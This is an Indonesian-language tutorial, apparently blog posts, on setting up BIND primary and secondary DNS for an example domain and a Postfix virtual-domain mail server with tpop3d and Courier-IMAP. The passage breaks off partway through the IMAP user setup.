Sebagai contoh anda sudah mendapatkan domain : kurowo.edu , sebagai rencana primary name server (ns1.kurowo.edu) , IP yang digunakan adalah 10.126.24.1 , secondary name server (ns2.kurowo.edu) : 10.126.24.2 , webserver (kurowo.edu maupun www.kurowo.edu) : 10.126.24.3 , ftp server (ftp.kurowo.edu) dialiaskan ke www.kurowo.edu,sedangkan sebagai primary mail exchanger (dursosono.kurowo.edu) : 10.126.24.4 , secondary mail exchanger / backup mail exchanger (duryudono.kurowo.edu) : 10.26.24.5 dan gateway(gateway.kurowo.edu)nya adalah : 10.126.24.6

Diumpamakan kita telah ssh ke IP 10.126.24.1 yang akan kita jadikan ns1.kurowo.edu setelah su - ke user root pindah ke direktori /var/namedkemudian kita bikin file database untuk zone kurowo.edu :

[root@wedus root]# cd /var/named
[root@wedus named]# vi db.kurowo.edu

Isi file db.kurowo.edu adalah sesuai data-data yang direncanakan seperti diatas :

$TTL 86400
@ IN SOA ns1.kurowo.edu. asfik.kurowo.edu. (
2003021500 ; serial
28800
14400
3600000
86400
)

IN NS ns1.kurowo.edu.
IN NS ns2.kurowo.edu.
IN MX 10 dursosono.kurowo.edu.
IN MX 20 duryudono.kurowo.edu.
IN A 10.126.24.3

ns1 IN A 10.126.24.1
ns2 IN A 10.126.24.2
www IN A 10.126.24.3
dursosono IN A 10.126.24.4
duryudono IN A 10.126.24.5
gateway IN A 10.126.24.6
ftp IN CNAME www

Kemudian pada file /usr/local/named/etc/named.conf ditambahkan :

zone "kurowo.edu" {
type master;
file "db.kurowo.edu";
};

Restart BIND, anda bisa menggunakan perintah rndc atau memberi sinyal HUP ke daemon named (killall -HUP named), disini kita gunakan rndc :

[root@wedus named]# /usr/local/named/sbin/rndc reload

Kemudian amati file /var/log/messages, seharusnya ada pesan sebagai berikut :

Feb 15 14:29:32 wedus named[25232]: loading configuration from '/usr/local/named/etc/named.conf'
Feb 15 14:29:32 wedus named[25232]: no IPv6 interfaces found
Feb 15 14:29:32 wedus named[25232]: zone kurowo.edu/IN: loaded serial 2003021500
Feb 15 14:29:32 wedus named[25232]: zone kurowo.edu/IN: sending notifies (serial 2003021500)

Periksa apakah konfigurasi yang kita tambahkan sudah benar-benar sesuai, kita bisa menggunakan perintah host :

[root@wedus named]# host -t ns kurowo.edu
kurowo.edu name server ns1.kurowo.edu.
kurowo.edu name server ns2.kurowo.edu.
[root@wedus named]# host -t mx kurowo.edu
kurowo.edu mail is handled by 10 dursosono.kurowo.edu.
kurowo.edu mail is handled by 20 duryudono.kurowo.edu.
[root@wedus named]# host www.kurowo.edu
www.kurowo.edu has address 10.126.24.3

Jika IP 10.126.24.3 sudah terhubung ke jaringan, anda bisa periksa dengan menggunakan ping ke hostnya langsung :

[root@wedus named]# ping www.kurowo.edu
PING www.kurowo.edu (10.126.24.3) from 10.126.24.1: 56(84) bytes of data.
64 bytes from 10.126.24.3: icmp_seq=0 ttl=255 time=223 usec
64 bytes from 10.126.24.3: icmp_seq=1 ttl=255 time=223 usec
64 bytes from 10.126.24.3: icmp_seq=2 ttl=255 time=242 usec

--- www.kurowo.edu ping statistics ---
3 packets transmitted, 3 packets received, 0% packet loss

Atau anda juga bisa menggunakan perintah dig :

[root@wedus named]# dig kurowo.edu
; <<>> DiG 9.2.2rc1 <<>> kurowo.edu
;; global options: printcmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 50880
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 2, ADDITIONAL: 2

;; QUESTION SECTION:
;kurowo.edu. IN A

;; ANSWER SECTION:
kurowo.edu. 86400 IN A 10.126.24.3

;; AUTHORITY SECTION:
kurowo.edu. 86400 IN NS ns2.kurowo.edu.
kurowo.edu. 86400 IN NS ns1.kurowo.edu.

;; ADDITIONAL SECTION:
ns1.kurowo.edu. 86400 IN A 10.126.24.1
ns2.kurowo.edu. 86400 IN A 10.126.24.2

;; Query time: 1 msec
;; SERVER: 127.0.0.1#53(127.0.0.1)
;; WHEN: Sat Feb 15 14:32:31 2003
;; MSG SIZE rcvd: 115

CATATAN : Setiap pembaharuan record terhadap database suatu zone selalu naikkan nomor serial ke yang lebih tinggi dari sebelumnya
Mengelola zone reverse (PTR)

Jika anda juga ingin merencanakan untuk mengelola zone PTR dari IP yang anda peroleh dari ISP anda, tentunya anda harus menanyakan dahulu ke ISP anda tentang delegasinya sehingga anda mempunya hak untuk mengelola reverse PTR IP anda. Sebagai contoh anda mendapatkan satu kelas C IP yaitu 10.126.24.0/24 dan sudah didelegasikan secara penuh oleh ISP anda, maka pada file named.conf yang telah dibuat pada seksi sebelumnya kita pastikan sudah terdapat zone untuk 24.126.10.in-addr.arpa,kemudian edit kembali file db.10.126.24 :

[root@wedus named]# vi db.10.126.24

Ubah isi dari file db.10.126.24 menjadi :

$TTL 86400
@ IN SOA ns1.kurowo.edu. asfik.kurowo.edu. (
2003021501 ; serial
28800 ; refresh
14400 ; retry
3600000 ; expiry
86400 ) ; minimum

IN NS ns1.kurowo.edu.
IN NS ns2.kurowo.edu.

1 IN PTR ns1.kurowo.edu.
2 IN PTR ns2.kurowo.edu.
3 IN PTR www.kurowo.edu.
4 IN PTR dursosono.kurowo.edu.
5 IN PTR duryudono.kurowo.edu.
6 IN PTR gateway.kurowo.edu.

Restart daemon BIND (killall -HUP named) :

[root@wedus named]# /usr/local/named/sbin/rndc reload

Periksa kembali apakah PTR yang kita seting sudah sesuai dengan keinginan, anda bisa menggunakan perintah host :

[root@wedus named]# host 10.126.24.1
1.24.126.10.in-addr.arpa domain name pointer ns1.kurowo.edu.
[root@wedus named]# host 10.126.24.2
2.24.126.10.in-addr.arpa domain name pointer ns2.kurowo.edu.
[root@wedus named]# host 10.126.24.3
3.24.126.10.in-addr.arpa domain name pointer www.kurowo.edu.
[root@wedus named]# host 10.126.24.4
4.24.126.10.in-addr.arpa domain name pointer dursosono.kurowo.edu.
[root@wedus named]# host 10.126.24.5
5.24.126.10.in-addr.arpa domain name pointer duryudono.kurowo.edu.
[root@wedus named]# host 10.126.24.6
6.24.126.10.in-addr.arpa domain name pointer gateway.kurowo.edu.

Atau menggunakan perintah dig :

[root@wedus named]# dig -x 10.126.24.4
; <<>> DiG 9.2.2rc1 <<>> -x 10.126.24.4
;; global options: printcmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 30843
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 2, ADDITIONAL: 2

;; QUESTION SECTION:
;4.24.126.10.in-addr.arpa. IN PTR

;; ANSWER SECTION:
4.24.126.10.in-addr.arpa. 86400 IN PTR dursosono.kurowo.edu.

;; AUTHORITY SECTION:
24.126.10.in-addr.arpa. 86400 IN NS ns1.kurowo.edu.
24.126.10.in-addr.arpa. 86400 IN NS ns2.kurowo.edu.

;; ADDITIONAL SECTION:
ns1.kurowo.edu. 86400 IN A 10.126.24.1
ns2.kurowo.edu. 86400 IN A 10.126.24.2

;; Query time: 1 msec
;; SERVER: 127.0.0.1#53(127.0.0.1)
;; WHEN: Sat Feb 15 14:53:44 2003
;; MSG SIZE rcvd: 142

Atau anda juga bisa memeriksa dengan menggunakan name serverISP anda :

[root@wedus named]# host 10.126.24.4 ns1.myloveleyisp.net.id
Using domain server:
Name: ns1.myloveleyisp.net.id
Address: 10.11.12.1#53
Aliases:

4.24.126.10.in-addr.arpa. domain name pointer dursosono.kurowo.edu
Membuat secondary name server

Setelah anda selesai membuat primary name server (ns1), langkah selanjutnya adalah membuat secondary name server (ns2). Tujuannya adalah untuk menerima query dns jika pada primary name server (ns1)sebagai server dns yang utama mengalami gangguan teknis ataupun terlalu sibuk. Oleh karena idealnya secondary name server (ns2) biasanya diletakkan pada network yang berbeda dengan primary name server (ns1),tentunya secondary name server (ns2) ini membutuhkan komputer/mesin yang lain (terpisah dari primary-nya/ns2) . Langkah instalasi secondary name server adalah sama ketika anda mengkonfigurasi primary name server. Namun, file yang yang digunakan hanyalah db.127.0.0, db.localhost,dan named.root.

Untuk memastikan hanya host dengan IP 10.126.24.2/32 (ns2) yang bisa mentransfer zone dari ns1, maka pastikan pada file named.confdi ns1 pada bagian options terdapat :

allow-transfer { 10.126.24.2/32; };

Kemudian anda bisa login (ssh) ke ns2, dan kemudian buat file named.conf yang isinya adalah sebagai berikut :

options {
directory "/var/named";
pid-file "/var/named/named.pid"; };

logging {
category lame-servers { null; };
};

zone "." IN {
type hint;
file "named.root";
};

zone "localhost" IN {
type master;
file "db.localhost";
allow-update { none; };
};

zone "0.0.127.in-addr.arpa" IN {
type master;
file "db.127.0.0";
allow-update { none; };
};

zone "kurowo.edu" {
type slave;
file "dbs.kurowo.edu";
masters { 10.126.24.1; };
};

zone "24.126.10.in-addr.arpa" {
file "dbs.10.126.24";
masters { 202.145.6.99; };
};

Kemdian restart daemon DNS di ns2 dengan perinta rndc (killall -HUP named) , jika sukses maka zone kurowo.edu dan zone 24.126.10.in-addr.arpa segera ditransfer dari ns1, dan pada file /var/log/messages terdapat pesan sebagai berikut :

Feb 15 14:31:47 kadal named[630]: transfer of 'kurowo.edu' from 10.126.24.1#53: end of transfer
Feb 15 14:31:47 kadal named[630]: transfer of '24.126.10.in-addr.arpa' from 10.126.24.1#53: end of transfer

Jika anda perhatikan juga file /var/log/messages pada ns1 maka akan menghasilkan pesan berikut :

Feb 15 14:42:43 wedus named[25232]: client 10.126.24.2#3918: transfer of 'kurowo.edu/IN': AXFR started
Feb 15 14:42:43 wedus named[25232]: client 10.126.24.2#1527: transfer of '24.126.10.in-addr.arpa/IN': AXFR started

Jika sukses, berarti primary name server (ns1) dan secondary name server (ns2) sudah beroperasi dengan benar. Ketika anda ingin menambahkan domain baru lagi yang lain, misalnya ayodyo.co.id, anda tinggal mengulangi langkah-langkah dalam seksi "Menambah sebuah domain" . Ketika domain yang anda kelola telah mencapai jumlah ribuan nama domain misalnya, dan anda ingin memisahkan data tersebut dari file konfigurasi named.conf, anda bisa menggunakan include di named.conf , misalnya :

include "/usr/local/named/etc/my.big.hosts.conf";
Mendelegasikan subdomain ke name server yang lain

Misalkan anda mempunyai domain kurowo.edu dan ada suatu bagian/departemen yang menginginkan pengelolaan database sendiri terhadap suatu subdomain, maka anda bisa mendelegasikan subdomain tersebut. Diumpamakan subdomain cs.kurowo.edu akan dikelola oleh Departemen Computer Science denganname server yaitu citraksa.cs.kurowo.edu (10.126.25.1) dan citraksi.cs.kurowo.edu (10.126.25.2) maka pada file named.conf di database zone kurowo.edu anda tambahkan :

; cs.kurowo.edu dikelola oleh name server ini
cs IN NS citraksa.cs.kurowo.edu.
IN NS citraksi.cs.kurowo.edu.
citraksa.cs IN A 10.126.25.1
citraksi.cs IN A 10.126.25.2

Restart daemon named, dan selanjutnya subdomain tersebut telah didelegasikan.
3. Istilah

Beberapa istilah/singkatan yang digunakan dalam database pada sebuah zone :

TTL : Time To Live
SOA : Start of Authority
NS : Name Server
MX : Mail Exchanger
TXT : Text
A : Adrress (name-to-address mapping)
PTR : Pointer (address-to-name mapping)
CNAME : Canonical name
4. Change Log

16 Februari 2003

Penulisan dokumen ini dimulai

18 Februari 2003

Pembuatan dokumen versi PDF dan penambahan seksi istilah

19 Februari 2003

Penambahan seksi salinan dan beberapa keterangan tentang pembaharuan serial number
5. Salinan

Salinan ijin dari Penerbit O'Reilly (Sejarah Internet, Sejarah DNS, Konsep dan hirarki DNS) :

From: Cindy Wetterlund
Subject: Re: Ask about permission
To: Asfihani (by way of Mary Hubben )
Cc: permissions@xxxxxxx.com, maryh@xxxxxxx.com
Date: Tue, 18 Feb 2003 13:51:35 -0800
X-Mailer: QUALCOMM Windows Eudora Version 4.3.2
X-Spam-Status: No, hits=-5.0 required=5.0 tests=IN_REP_TO version=2.20
X-Spam-Level: Message-Id: <4.3.2.7.2.20030218134230.023b05f8@xxxx.xxxx.xxxx.com>

Hello Asfihani,
Thank you for your mail and inquiry.

O'Reilly gives you permission to use the below mentioned material
from "DNS and BIND" 3rd edition for educational purposes only.
Since there is a new edition available, it will be appreciated if you add to
the reference information a link to the source http://www.oreilly.com/catalog/dns4/
so readers know where to find the most current information.

I hope this is helpful.
Best,
Cindy

Salinan ijin dari Internet Software Consortium (Sejarah BIND) :

From: Paul Vixie
Subject: Re: Ask about permission
To: Asfihani
Cc: info@xxxxxxx.org Date: Mon, 17 Feb 2003 15:59:20 +0000
X-Mailer: MH-E 7.2; nmh 1.0.4; GNU Emacs 21.2.1
X-Spam-Status: No, hits=-5.0 required=5.0 tests=IN_REP_TO version=2.20
X-Spam-Level: Message-Id: <20030217155920.A6FFA379EF3@as.xxxxx.com>

no problem. please give us attribution when you quote our material.
but, you may quote as much of it as you wish.
6. Referensi

DNS and BIND 3rd Edition ditulis oleh Paul Albitz dan Cricket Liu, penerbit O'Reilly tahun 1998, anda bisa mendapatkan edisi yang paling baru (edisi ke 4) di http://www.oreilly.com/catalog/dns4
http://www.isc.org/products/BIND/bind-history.html
http://www.tldp.org/HOWTO/DNS-HOWTO.html

Virtual domain di postfix dengan tpop3d, courier-imap dan squirrelmail

2005-03-07T04:38:00.000-08:00

Mengkonfigurasi virtual domain (dengan format Maildir) pada postfix memang tidak semudah mengkonfigurasi virtual domain pada qmail+vpopmail ataupun qmail+vmailmgr. Saya yakin, dokumentasi ini sangat minim, sehingga tool untuk mengadministrasi user melalui web pun tidak dibahas (karena saya belum tahu tool tersebut hehe). Anda mungkin bertanya mengapa tidak menggunakan mysql atau semacamnya sebagai backend dari virtual domainnya, dan jawabannya cuman satu : karena saya tidak ingin menggunakannya. Seperti biasa, tidak ada copyright apapun dalam dukumen ini, anda bebas menyalin, mencetak, maupun memodifikasi (dengan menyertakan nama penulis asli). Jika ada pertanyaan silakan join #indolinux di EFnet IRC Network, disana banyak rekan-rekan yang akan membantu anda. Oh iya tidak lupa saya ucapkan terima kasih kepada pak PY Adi Prasaja yang selalu jadi acuan jika ada error :). Saran, koreksi, kritik, kesalahan ketik, maupun ucapan silakan dikirimkan ke email tersebut diatas. Terima Kasih. CATATAN: Tutorial ini tidak cocok bagi yang baru mendalami Postfix dan hanya sesuai dengan Postfix versi 2.0.6 :-)

Jika Anda merasa apa yang saya tulis berikut ini berguna dan ingin membuat saya gembira, Anda bisa mengirimkan satu (atau lebih) CD dari daftar wishlist saya. Tentu saja, usaha Anda akan sangat saya hargai :-).

Untuk ahli matematika dan algoritma : Abu Ja'far Muhammad ibnu Musa Al-Khwarizmi (Baghdad 780 - ? 850) dan komposer musik klasik sejati : Wolfgang Amadeus Mozart (Salzburg 1756 - Vienna 1791)
1. Instal Postfix

Sebelum memulai, silakan anda uninstall software mailserver (MTA) lain yang berada dalam server anda misalnya untuk Redhat biasanya terdapat sendmail dan postfix standar, dan silakan anda membuat sebuah direktori temporari untuk memudahkan penyimpanan source yang akan didownload. Anda boleh membuat direktori dengan nama sembarang, seperti biasa disini saya membuat direktori dengan nama src :

[root@wolfgang asfik]# service sendmail stop
[root@wolfgang asfik]# for a in $(rpm -qa | grep sendmail); do rpm -e --nodeps $a; done
[root@wolfgang asfik]# for a in $(rpm -qa | grep postfix); do rpm -e --nodeps $a; done
[root@wolfgang asfik]# mkdir src
[root@wolfgang asfik]# cd src

Buat username dan group yang akan mengurusi postfix :

[root@wolfgang src]# adduser -M -d /no/home -s /no/shell postfix
[root@wolfgang src]# groupadd postdrop

Download source postfix (yang paling baru), anda bisa mendapatkannya dari mirror terdekat di Indonesia yaitu ISP CBN (untuk mirror yang lain silakan anda berkunjung ke http://www.postfix.org), serta download patch (yang paling baru dan sesuai dengan postfi-nya) untuk digunakan pada virtual delivery agent :

[root@wolfgang src]# wget ftp://ftp.cbn.net.id/mirror/postfix-release/official/postfix-2.0.6.tar.gz
[root@wolfgang src]# wget http://ftp.oav.net/others/postfix/VDA/postfix-2.0.6.patch.gz

Ekstrak :

[root@wolfgang src]# gunzip postfix-2.0.6.patch.gz
[root@wolfgang src]# tar -xzvf postfix-2.0.6.tar.gz

Ganti ke direktori source postfix, patch kemudian install. Pada waktu melaksanakan make install nantinya anda akan ditanya-tanya, tekan enter saja :) :

[root@wolfgang src]# cd postfix-2.0.6
[root@wolfgang postfix-2.0.6]# patch -p1 < ../postfix-2.0.6.patch
[root@wolfgang postfix-2.0.6]# make
[root@wolfgang postfix-2.0.6]# make install

Edit file /etc/postfix/main.cf pada bagian :

myhostname = wolfgang.cs.perbanas.edu
mydestination = $myhostname, localhost.$mydomain
mynetworks = 127.0.0.0/8
alias_maps = hash:/etc/aliases
alias_database = hash:/etc/aliases
home_mailbox = Maildir/

Silakan anda ganti myhostname dengan hostname yang FQDN, biasanya adalah host dimana postfix tersebut dijalankan. Pada mydestination silakan anda tambahkan domain yang dianggap sebagai domain lokal bukan domain virtual. Jika anda merencanakan postfix agar bisa digunakan sebagai smtp dari network anda (misalnya network 10.126.10.0/24) maka anda tambahkan pada mynetworks = 10.126.10.0/24 . Dan jika anda ingin menggunakan RBL untuk melawan email spam maka tambahkan :

maps_rbl_domains = relays.ordb.org
smtpd_helo_restrictions = reject_maps_rbl, permit_mynetworks

Untuk menolak pengirim dari domain yang tidak mempunya record A atau MX :

smtpd_sender_restrictions = reject_unknown_sender_domain

Kemudian bikin email alias yang akan mengurusi hal-hal yang berkaitan dengan urusan teknis (ganti email asfik@cs.perbanas.edu sesuai dengan konfigurasi yang anda inginkan) :

[root@wolfgang src]# echo "postfix: root" > /etc/aliases
[root@wolfgang src]# echo "root : asfik@cs.perbanas.edu" >> /etc/aliases
[root@wolfgang src]# echo "mailer-daemon : asfik@cs.perbanas.edu" >> /etc/aliases
[root@wolfgang src]# echo "postmaster : asfik@cs.perbanas.edu" >> /etc/aliases

Bikin database dari file aliases :

[root@wolfgang src]# newaliases

Start daemon postfix :

[root@wolfgang src]# postfix start

Jika anda perhatikan file log (tail -f /var/log/maillog)akan anda dapatkan :

Mar 26 15:21:49 wolfgang postfix/postfix-script: starting the Postfix mail system
Mar 26 15:21:49 wolfgang postfix/master[4043]: daemon started -- version 2.0.6

Untuk menjalankan daemon postfix secara otomatis setiap kali server direstart :

[root@wolfgang src]# echo "/usr/sbin/postfix start" >> /etc/rc.local

Kemudian anda bisa mencoba mengetest mengirimkan suatu email ke domain lokal yang sesuai dengan definisi pada mydestination. Jika suskses, maka akan masuk ke dalam direktori Maildir/ di home direktori user yang anda kirimin email. Langkah selanjutnya adalah mengkonfigurasi user sistem yang akan bertugas mengurusi semua virtual domain di postfix, disini kita misalkan user tersebut adalah virtual :

[root@wolfgang src]# adduser virtual

Cek UID dan GID dari informasi user tersebut karena akan kita gunakan untuk pada konfigurasi postfix :

[root@wolfgang src]# id virtual
uid=521(virtual) gid=522(virtual) groups=522(virtual)

Edit kembali file /etc/postfix/main.cf, tambahkan beberapa baris berikut ini (ganti angka 521/522 dengan UID/GID dari user yang akan kita jadikan sebagai basecamp domain-domain virtual, misalnya user virtual) :

mailbox_transport = virtual
virtual_mailbox_base = /home/virtual
virtual_mailbox_maps = hash:/etc/postfix/virtual
virtual_uid_maps = static:521
virtual_gid_maps = static:522
virtual_create_maildirsize = yes

Pada virtual_mailbox_base tersebut nantinya email semua virtual domain akan disimpan pada direktori tersebut. Oleh karena itu pada waktu adduser user virtual tersebut anda bisa menentukan dimana kira-kira sisa harddisk anda yang paling banyak, tentunya anda bisa menggunakan argument -d pada waktu adduser untuk mengarahkannya. Sebagai contoh misalnya kita akan membuat sebuah virtual domain yang bernama cs.perbanas.edu, maka nantinya semua email pada domain tersebut akan disimpan pada direktori /home/virtual/cs.perbanas.edu .

Langkah selanjutnya adalah edit file /etc/postfix/virtual, pada bagian paling bawah tambahkan :

cs.perbanas.edu Computer Science Department STIMIK Perbanas

Kemudian juga kita bikin sebuah account test misalnya asfik@cs.perbanas.edu, maka anda tambahkan juga pada file yang sama (tanda / pada akhir baris menujukkan penggunaan format Maildir sebagai penyimpanan email) :

asfik@cs.perbanas.edu cs.perbanas.edu/asfik/

Jangan lupa email postmaster@cs.perbanas.edu juga akan diforward ke asfik@cs.perbanas.edu, maka kita tambahkan :

postmaster@cs.perbanas.edu cs.perbanas.edu/asfik/

Bikin database dari file tersebut :

[root@wolfgang src]# postmap /etc/postfix/virtual

Test untuk mengirim ke email tersebut (jangan khawatir, karena postfix akan membuatkan direktori new,cur,tmp secara otomatis), maka jika sukses konfigurasi anda, pada file /var/log/maillog bisa anda dapatkan :

Mar 29 14:14:56 wolfgang postfix/virtual[9689]: E81EABB3A: to=,
relay=virtual, delay=0, status=sent (maildir)

Untuk memastikan anda bisa memeriksa file email tersebut pada direktori /home/virtual/cs.perbanas.edu/asfik/new :

[root@wolfgang src]# ls /home/virtual/cs.perbanas.edu/asfik/new/
1049073505.V307I14f59f.wolfgang.cs.perbanas.edu

Jika anda ingin membatasi quota setiap user virtual, edit file /etc/postfix/main.cf, kemudian tambahkan baris berikut ini :

virtual_mailbox_limit_maps = hash:/etc/postfix/vquota
virtual_mailbox_limit_override = yes

Reload daemon postfix :

[root@wolfgang src]# postfix reload

Kemudian buat file /etc/postfix/vquota, misalnya untuk user virtual asfik@cs.perbanas.edu akan kita quota sebesar 1 Mb, maka pada file tersebut tambahkan sebagai berikut :

asfik@cs.perbanas.edu 1024000

Generate database dari file tersebut supaya dibaca oleh postfix :

[root@wolfgang src]# postmap /etc/postfix/vquota

Bila anda melakukan penambahan virtual domain yang lain (lagi), anda tinggal mengedit file /etc/postfix/virtual, misalnya sebagai contoh untuk menambahkan domain alkhwarizmi.net dengan user asfik@alkhwarizmi.net:

alkhwarizmi.net Al-Khwarizmi Foundation
asfik@alkhwarizmi.net alkhwarizmi.net/asfik/

Jika sukses semua email untuk user di domain alkhwarizmi.netnanti akan disimpan pada direktori /home/virtual/alkhwarizmi.net dan seperti biasa, jangan lupa untuk melakukan postmap ke pada file /etc/postfix/main.cf agar database yang baru dibaca oleh postfix.
2. Install tpop3d

Sebagai POP3 servernya kita gunakan tpop3d yang mendukung format Maildir dengan menggunakan metode autentikasi file text biasa (flat-text/flat file), donwload tpop3d (yang paling baru) dan patch untuk auth-flatfile:

[root@wolfgang src]# wget http://www.ex-parrot.com/~chris/tpop3d/tpop3d-1.4.2.tar.gz
[root@wolfgang src]# wget http://www.ex-parrot.com/~chris/tpop3d/tpop3d-1.4.2-auth-flatfile-broken.patch

Ekstrak, kemudian ganti direktori ke source tpop3d :

[root@wolfgang src]# tar -xzvf tpop3d-1.4.2.tar.gz
[root@wolfgang src]# cd tpop3d-1.4.2

Patch, kemudian compile,dan install :

[root@wolfgang tpop3d-1.4.2]# patch -p0 < ../tpop3d-1.4.2-auth-flatfile-broken.patch
[root@wolfgang tpop3d-1.4.2]# ./configure --enable-auth-flatfile --enable-mbox-maildir
[root@wolfgang tpop3d-1.4.2]# make
[root@wolfgang tpop3d-1.4.2]# make install

Buat file /etc/tpop3d.conf isinya :

listen-address: 0.0.0.0
log-facility: local6
mailbox: maildir:/home/virtual/$(domain)/$(local_part)/
auth-flatfile-enable: yes
auth-flatfile-passwd-file: /etc/virtual/$(domain)/passwd
auth-flatfile-mail-user: virtual
auth-flatfile-mail-group: virtual

Jika user yang menghandel domain virtual adalah bukan user virtual, maka silakan anda sesuaikan pada auth-flatfile-mail-user dan auth-flatfile-mail-group . Kemudian karena kita tidak ingin membanjiri file /var/log/maillogdengan pesan dari daemon tpop3d maka kita putuskan untuk menyimpan log tersebut pada file yang lain, misalnya /var/log/tpop3d.log, maka pada file /etc/syslog.conf tambahkan :

local6.* /var/log/tpop3d.log

Bikin file /var/log/tpop3d.log :

[root@wolfgang src]# touch /var/log/tpop3d.log

Restart syslogd anda (killall -HUP syslogd atau service syslog restart), kemudian jalankan daemon tpop3d :

[root@wolfgang src]# /usr/local/sbin/tpop3d

Untuk menjalankan daemon tersebut secara otomatis setiap kali server direstart :

[root@wolfgang src]# echo "/usr/local/sbin/tpop3d" >> /etc/rc.local

Buat direktori untuk menyimpan database password untuk user virtual, nantinya setiap password dari virtual domain akan disimpan dengan format berikut /etc/virtual/DOMAIN/passwd misanyalnya untuk domain cs.perbanas.edu akan disimpan dalam file /etc/virtual/cs.perbanas.edu/passwd:

[root@wolfgang src]# mkdir /etc/virtual

Sebenarnya anda bisa membuat sendiri data password tersebut dengan menggunakan utilitas htpasswd yang bisa anda dapatkan dari paket software apache. Format password yang digunakan adalah sama dengan format password pada file /etc/passwd . Namun, saya juga membuat shell script yang sangat sederhana dan juga menggunakan (membutuhkan binari) dari htpasswd tersebut, anda bisa mendapatkannya di http://people.cakraweb.com/~asfik/vtadduser dan http://people.cakraweb.com/~asfik/vtdeluser (tentu anda harus mencocokkan variabel-variabel yang dibutuhkan jika berbeda dengan contoh disini) :

[root@wolfgang src]# wget http://people.cakraweb.com/~asfik/vtadduser
[root@wolfgang src]# wget http://people.cakraweb.com/~asfik/vtdeluser
[root@wolfgang src]# mv {vtadduser,vtdeluser} /usr/bin
[root@wolfgang src]# chmod 755 /usr/bin/{vtadduser,vtdeluser}

Misalkan untuk membuat password user asfik@cs.perbanas.edu dengan password rahasiadeh :

[root@wolfgang src]# vtadduser asfik@cs.perbanas.edu rahasiadeh

Test dengan telnet ke localhost port 110 (tentunya anda juga bisa mencobanya dengan Eudora atau MUA kesayangan anda yang lain) :

[root@wolfgang src]# telnet localhost 110
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
+OK
user asfik@cs.perbanas.edu
+OK Tell me your password.
pass rahasiadeh
+OK Welcome aboard! You have 2 messages.
list
+OK Scan list follows:
1 794
.
quit
+OK Done
Connection closed by foreign host.

Untuk menghapus user dan password (tidak termasuk data email), anda bisa menggunakan perintah vtdeluser, misalnya :

[root@wolfgang src]# vtdeluser asfik@cs.perbanas.edu

Jika anda menginginkan data email user tersebut dihapus juga, anda bisa menghapus secara manual direktori /home/virtual/cs.perbanas.edu/asfik, jika anda tidak menginginkan akses email dengan menggunakan webmail maka anda sudah selesai mengkonfigurasi postfix dengan virtual domain dan pop3 servernya :)
3. Instal Courier-IMAP

Courier Imap, sesuai dengan namanya adalah sebuah IMAP server yang mendukung format penyimpanan email dengan menggunakan format Maildir. Dalam hal ini kita menggunakan Courier Imap untuk backend dari webmail squirrelmail.

Donwload courier-imap (yang paling baru), ekstrak sourcenya, dan kita kompilasi :

[root@wolfgang src]# wget http://www.courier-mta.org/beta/imap/courier-imap-1.7.1.20030319.tar.bz2
[root@wolfgang src]# tar -jxvf courier-imap-1.7.1.20030319.tar.bz2
[root@wolfgang src]# cd courier-imap-1.7.1.20030319
[root@wolfgang courier-imap-1.7.1.20030319]# ./configure --enable-workarounds-for-imap-client-bugs --disable-root-check
[root@wolfgang courier-imap-1.7.1.20030319]# make
[root@wolfgang courier-imap-1.7.1.20030319]# make install

Kita tidak membutuhkan module autentikasi yang lain (jika ada), jadi module dari courier-imap kita dihapus saja :) :

[root@wolfgang courier-imap-1.7.1.20030319]# rm -rf /usr/lib/courier-imap/libexec/authlib/*

Salin modul authuserdb dari source courier-imap yang telah kita kompilasi diatas ke direktori modul authentikasi untuk imap servernya :

[root@wolfgang courier-imap-1.7.1.20030319]# cp authlib/authuserdb /usr/lib/courier-imap/libexec/authlib/

Salin file konfigurasi standar dari courier-imap :

[root@wolfgang courier-imap-1.7.1.20030319]# cp /usr/lib/courier-imap/etc/imapd.dist /usr/lib/courier-imap/etc/imapd
[root@wolfgang courier-imap-1.7.1.20030319]# cp /usr/lib/courier-imap/etc/imapd-ssl.dist /usr/lib/courier-imap/etc/imapd-ssl

Edit file /usr/lib/courier-imap/etc/imapd , karena courier imap ini hanya digunakan untuk webmail ganti pada baris ADDRESS=0 menjadi ADDRESS=127.0.0.1 . Jika webmail anda adalah webmail yang sibuk, anda bisa menaikkan variabel MAXDAEMONS dan MAXPERIP, yang terpenting adalah ganti pada AUTHMODULES="authdaemon" menjadi AUTHMODULES="authuserdb":

Start daemon courier-imap :

[root@wolfgang courier-imap-1.7.1.20030319]# /usr/lib/courier-imap/libexec/imapd.rc start

Anda bisa memeriksa apakah servise courier-imap anda sudah berjalan semestinya, kita gunakan perintah ps :

[root@wolfgang courier-imap-1.7.1.20030319]# ps ax | grep imap
32461 ? S 0:00 /usr/lib/courier-imap/libexec/courierlogger imapd
32458 ? S 0:00 /usr/lib/courier-imap/libexec/couriertcpd -address=0

Agar setiap reboot daemon courier-imap dijalankan secara otomatis :

[root@wolfgang courier-imap-1.7.1.20030319]# echo "/usr/lib/courier-imap/libexec/imapd.rc start" >> /etc/rc.local

Langkah selanjutnya adalah membuat user dan password IMAP yang akan digunakan sebagai autentikasi pada webmail squirrelmail dengan menggunakan skema autentikasi userdb . Buat direktori /etc/userdb, kemudian ubah modenya menjadi 700 :

[root@wolfgang src]# mkdir /etc/userdb
[root@wolfgang src]# chmod 700 /etc/userdb

Anda bisa menggunakan script sederhana yang saya buat untuk menambah atau menghapus user virtual di IMAP atau anda bisa juga melakukannya secara manual, anda bisa memilih sesuai mood anda :)

Jika menggunakan script, anda bisa mendownload script tersebut di http://people.cakraweb.com/~asfik/vtadduserimap dan http://people.cakraweb.com/~asfik/vtdeluserimap (tentu anda harus mencocokkan variabel-variabel yang dibutuhkan jika berbeda dengan contoh disini) :

[root@wolfgang src]# wget http://people.cakraweb.com/~asfik/vtadduserimap
[root@wolfgang src]# wget http://people.cakraweb.com/~asfik/vtdeluserimap
[root@wolfgang src]# mv {vtadduserimap,vtdeluserimap} /usr/bin
[root@wolfgang src]# chmod 755 /usr/bin/{vtadduserimap,vtdeluserimap}

Untuk menambah user virtual di IMAP misalnya asfik@cs.perbanas.edu lakukan :

[root@wolfgang src]# vtadduserimap asfik@cs.perbanas.edu

Untuk menghapusnya :

